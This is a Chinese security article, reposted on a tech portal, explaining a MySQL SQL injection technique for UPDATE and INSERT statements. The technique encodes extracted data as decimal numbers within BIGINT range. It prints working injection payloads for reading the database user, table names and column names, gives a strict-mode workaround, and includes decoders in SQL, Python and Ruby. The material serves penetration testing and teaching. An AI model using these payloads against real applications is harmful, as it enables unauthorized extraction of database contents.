51CTO首页
AI.x社区
博客
学堂
精品班
直播训练营
企业培训
鸿蒙开发者社区
WOT技术大会
AIGC创新中国行
公众号矩阵
移动端
短视频免费课程课程排行直播课软考学堂
全部课程厂商认证IT技术2024年软考PMP项目管理软考资讯
在线学习
文章资源问答课堂专栏直播
51CTO
鸿蒙开发者社区
51CTO技术栈
51CTO官微
51CTO学堂
51CTO博客
CTO训练营
鸿蒙开发者社区订阅号
51CTO题库小程序
51CTO学堂APP
51CTO学堂企业版APP
鸿蒙开发者社区视频号
账号设置 退出

一种新的MySQL下Update、Insert注入方法

作者:testvul_001
安全 数据安全
目前我们一般通过报错和时间盲注来对update和insert语句进行SQL注入,下面我们来讲解一种新的获取数据的方法。

[[183607]]

一、前言

目前我们一般通过报错和时间盲注来对update和insert语句进行SQL注入,下面我们来讲解一种新的获取数据的方法。

首先我们来看一个简单的例子,假设应用会将username字段的结果会返回给我们:

  1. $query = "UPDATE users SET username = '$username' WHERE id = '$id';"

HTTP应用中的参数是这样的:

  1.      
  2. username=test&id=16 

我最近研究的带内,带外攻击技巧刚好适用于这个场景,要理解我的技巧,我们可以先看下Mysql 是如何处理字符串的。在Mysql 中一个字符串等于 ‘0’,我们来看一下:

Mysql 是如何处理字符串

假如我们把字符串和数字相加,结果和0 加这个数字一样:

Mysql 是如何处理字符串

Mysql的这个属性给了我一些灵感,我们来看看BIGINT的最大值加上一个字符串会怎样?

BIGINT的最大值加上一个字符串

结果是 ‘1.8446744073709552e19’,这表明字符串实际上作为八字节的DOUBEL类型来处理。

八字节的DOUBEL类型

将一个DOUBLE类型和大数字相加会返回IEEE格式的值,为了解决这个问题我们可以使用OR。

OR

现在我们得到了最大的64bit无符号的BIGINT值0xffffffffffffffff。我们需要注意通过OR获取数据时,这个值必须小于BIGINT(不能超过64bit)。

二、转换字符串为数字

为了获取数据我们可以将应用输出的字段转换为数字,然后再解码回来,如下步骤:

  1. String -> Hexadecimal -> Decimal 

将应用输出的字段转换为数字

通过SQL,Python和Ruby等语言我们可以将数字转回字符串,如下:    

  1. Decimal -> Hexadecimal -> String 

通过SQL,Python和Ruby等语言我们可以将数字转回字符串

如上面提到的,Mysql中的最大值为BIGINT,我们不能超过它,也就是说每次提取的字符串不能超过8位。

Mysql中的最大值为BIGINT

4702111234474983745可以被解码为AAAAAAAA,如果再加一个A,我们就不能正确解码了,因为返回的结果会是无符号的BIGINT值0xffffffffffffffff。

BIGINT值0xffffffffffffffff

如果需要获取的数据超过8个字节,我们需要使用substr()方法来将数据分片。

  1. select conv(hex(substr(user(),1 + (n-1) * 8, 8 * n)), 16, 10); 

n的取值为1、2、3…比如我们要获取的username长度超过8个字符,我们首先获取前八个字符,然后继续获取后面的8个直到得到NULL。

8个直到得到NULL

最后我们把user()函数获得的数据解码。

把user()函数获得的数据解码

三、注入技巧

1. 获取表名

  1. select conv(hex(substr((select table_name from information_schema.tables where table_schema=schema() limit 0,1),1 + (n-1) * 8, 8*n)), 16, 10); 

2. 获取列名

  1.      
  2. select conv(hex(substr((select column_name from information_schema.columns where table_name=’Name of your table’ limit 0,1),1 + (n-1) * 8, 8*n)), 16, 10); 

3. 利用UPDATE语句

下面我们通过一个例子来说明如何利用更新语句。

利用更新语句

实际的查询语句可能是这样的:

实际的查询语句

实际的查询语句

4. 利用INSERT语句

原始SQL语句如下:

  1. insert into users values (17,'james', 'bond'); 

我们可以像update语句中一样获取数据:

  1. insert into users values (17,'james', 'bond'|conv(hex(substr(user(),1 + (n-1) * 8, 8* n)),16, 10); 

MySQL 5.7中的限制

你可能注意到这种方法在MySQL 5.7.5之后的版本并不奏效。

MySQL 5.7.5

通过研究MySQL 5.7发现Mysql服务器默认运行在‘Strict SQL Mode’下,在MySQL 5.7.5里,默认的模式包含‘STRICT_TRANS_TABLES’。在 ‘Strict SQL Mode’ 下我们不能将integer转换为string。

将integer转换为string

为了解决这个问题,我们需要在注入时一直使用一个integer类型,这样就不会有任何问题了。

在注入时一直使用一个integer类型

另外任何用户都可以在他的会话里关闭‘Strict Mode’。

‘Strict Mode’

如果想设置影响所有客户端的全局属性需要SUPER权限。

开发者也可以使用‘IGNORE’关键字来忽略‘Strict Mode’,如‘INSERT IGNORE’或者‘UPDATE IGNORE’。

‘Strict Mode’

四、解码Decoding

SQL

  1. select unhex(conv(value, 10, 16)); 

Python

  1. dec = lambda x:("%x"%x).decode('hex') 

Ruby

  1. dec = lambda { |x| puts x.to_s(16).scan(/../).map { |x| x.hex.chr }.join }或 
  2. dec = lambda { |x| puts x.to_s(16).scan(/\w+/).pack("H*") } 
责任编辑:赵宁宁 来源: 安全客
MySQLUpdateInsert数据
相关推荐
一种攻击方法——Java Web表达式注入
本文笔者向各位介绍一种新的攻击方法,我们可能会在未来很长的一段时间内和它打交道,就像我们当初和SQL注入、代码执行、命令执行这些一样。它的名字叫做JavaWebExpressionLanguageInjection——JavaWeb表达式注入。

2014-07-04 09:28:25

一种安全检测方法
我们的运营基于这样的假设,并希望我们实施的控制措施——从web应用的漏扫到终端上的杀毒软件——防止恶意的病毒和软件进入我们的系统,损坏或偷取我们的信息。

2018-12-14 14:30:12

安全检测布式系测试
RoSA:一种大模型参数高效微调方法
随着语言模型不断扩展到前所未有的规模,对下游任务的所有参数进行微调变得非常昂贵,PEFT方法已成为自然语言处理领域的研究热点。PEFT方法将微调限制在一小部分参数中,以很小的计算成本实现自然语言理解任务的最先进性能。

2024-01-18 15:38:17

语言模型大型语言模型
从云到 Cloudlets:一种数据处理方法
在本文中,我们将探讨小云的兴起:它们是什么,它们带来的挑战,以及它们是否是一种比我们已经习惯的云更可行的联网设备方式。

2022-06-09 09:38:39

Cloudlets云存储
一种特别简单MySQL数据库安装方法
MySQL数据库虽然功能性不是很强大,但是MySQL数据库还是凭借着自身的种种优点赢得了广大用户的喜爱,MySQL数据库在数据库市场中还是占据着一定的地位,下文就为大家介绍一种很简单的MySQL数据库安装的方法。

2011-04-06 10:09:56

MySQL数据库安装
认识一种类型云:隐形云
随着云计算的爆发式增长,如今云的类型也已不止一种。现在有公有云、私有云、社区云和混合云。除了这些类型之外,我们还可以再提出一个新的名词,“隐形云”。恰如这一名称所揭示的,这是一个悄然的、看不见的、未被人注意到的云类型。本质上讲,隐形云所提供的服务是被商业客户在不知情的情况下所消费的,而且没有获得CIO和IT部门的允许或支持。

2010-11-05 10:15:42

云计算
量子算法征服了一种问题!
量子世界会不会有许多其他问题从几乎无法解决变为可以解决?

2022-08-08 08:22:22

量子计算
介绍一种快速测试方法
快速测试是指通过分析测试质量成本、时间人员、风险等因素,明确测试内容及测试方法,从而提高测试效率。本文具体介绍快速测试,希望对你有帮助。

2011-07-04 17:53:48

快速测试
Linux4实时监控日志文件方法,总有一种适合你
在Linux下如何才能实时查看日志内容呢有很多工具可以帮助我们在文件持续修改的同时输出文件内容,最常用的莫过于tail命令了。

2019-11-13 08:52:19

Linux监控日志
教你一种简单CentOS安装方法
如何用光盘进行CentOS安装。用一种简单的方法,分为17个步骤来进行CentOS安装。设置完毕,就可以开始安装了.安装过程为3060分钟。

2010-03-26 13:34:47

CentOS安装
分享一种有趣数据解析方法
常用的GPS模块大多采用NMEA0183协议,目前业已成了GPS导航设备统一的RTCM(RadioTechnicalCommissionforMaritimeservices)标准协议。

2021-06-11 00:11:23

GPS数据协议
App已成为一种媒体
近日,数据调查机构Asymco发布了一份最新出炉的苹果应用分布图,显示了iOS应用在全球的分布情况。通过该图,我们可以看到,和互联网一样,应用已经遍布全球,成为了一种新的大众传媒形式。

2011-12-28 21:18:18

App
Linux隐藏网络连接一种方法
直接inlinehook住gettcp4sock这个函数就行了,只不过需要重新实现下gettcp4sock的功能,在作下过滤。比较简单......

2009-06-17 12:01:21

Linux
Linux隐藏网络连接一种方法
直接inlinehook住gettcp4sock这个函数就行了,只不过需要重新实现下gettcp4sock的功能,在作下过滤。比较简单,代码如下:

2009-06-17 09:05:05

Linux隐藏网络链接命令
一种保护云中密码加密方法
在本文中,后端开发人员可以了解为什么使用加密很重要,以及如何有效地使用它来保护云上的用户信息(特别是密码),使得数据即使泄露也不会在数十年内被破解。安全性是云中的一个非常重要的主题,它对全栈开发至关重要,而且在所有产品和服务上都不可或缺。

2018-02-08 08:11:41

一种可高度规避检测威胁:HEAT
HEAT(HighlyEvasiveAdaptiveThreat)是一种具备高度规避性的自适应新威胁,它使用多种技术,专门规避当前安全架构中多层机制的检测。

2022-04-06 12:00:46

HEAT安全架构新威胁
Tomcat 配合虚拟线程,一种编程体验
虚拟线程带给了现代程序员新的编程体验,使用阻塞编程也能开发出高性能应用程序,而避免了异步模型的编程复杂度,随着更多的框架接入虚拟线程,相信虚拟线程会在未来大放异彩。

2023-12-04 08:21:18

虚拟线程Tomcat
数据令牌化:一种数据脱敏方式
作为一种新型数据安全策略,数据令牌化能帮助企业在完全遵循数据法规的同时,继续保持高效、安全运营。

2022-07-28 11:29:23

数据安全数据令牌化
Text2Image:一种NLP思路
本文寻找到了一种新的NLP处理方式,探索将NLP与计算机视觉处理结合,将文本绘制成图片。

2019-11-22 09:21:17

技术研发数据
大数据,是一种思维方式
人工智能只是一种技术手段,数据资产最终决定人工智能的行业应用发展,以及企业新的市场。

2020-12-16 10:12:52

大数据小数据人工智能
点赞
收藏

51CTO技术栈公众号

业务
速览
在线客服